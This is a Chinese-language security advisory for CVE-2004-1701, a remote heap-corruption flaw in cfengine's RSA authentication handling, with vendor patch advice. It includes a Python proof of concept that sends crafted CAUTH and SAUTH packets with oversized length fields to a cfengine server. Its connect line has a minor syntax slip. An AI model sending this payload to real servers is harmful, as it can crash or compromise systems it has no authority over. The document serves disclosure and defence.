Cfengine RSA验证堆破坏远程执行指令漏洞
发布日期:2004-08-09
更新日期:2004-08-11
受影响系统:Cfengine Cfengine 2.1.7p1
Cfengine Cfengine 2.1.7
Cfengine Cfengine 2.0.0
不受影响系统:Cfengine Cfengine 2.1.8
描述:
CVE(CAN) ID:
CVE-2004-1701
cfengine(配置引擎)是一款UNIX 管理工具,是管理任务自动化。
cfengine AuthenticationDialogue()函数没有充分检查缓冲区边界,远程攻击者可以利用这个漏洞以进程权限在系统上执行任意指令。
AuthenticationDialogue()函数用于处理SAUTH命令和执行RAS验证及KEY协定。由于对外部提供的网络数据:iscrypt, crypt_len和nonce_len缺少正确的检查,在进行堆分配时可导致任意字节被覆盖。精心构建提交数据可能以进程权限在系统上执行任意指令。
<*来源:Core Security Technologies
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=109208394910086&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Core Security Technologies 提供了如下测试方法:
import struct
import socket
import time
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.1.1',5308)
# CAUTH command
p = 'k' # status
p += '0000023' # len
p += 'CAUTH ' # command
p += 'HARE KRISHNA HARE'
print 'sending CAUTH command...'
s.send(p)
# SAUTH command
p = 'k' # status
p += '0003000' # len
p += 'SAUTH ' # command
p += 'n' # iscrypt
p += '00000010 ' # crypt_len
p += '00001000' # nonce_len
p += 'X' * 3000
print 'sending SAUTH command...'
s.send(p)
a = s.recv(4096)
print a
建议:
厂商补丁:
Cfengine
--------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载最新的Cfengine 2.1.8版本:
http://www.cfengine.org浏览次数:2680
严重程度:0(网友投票)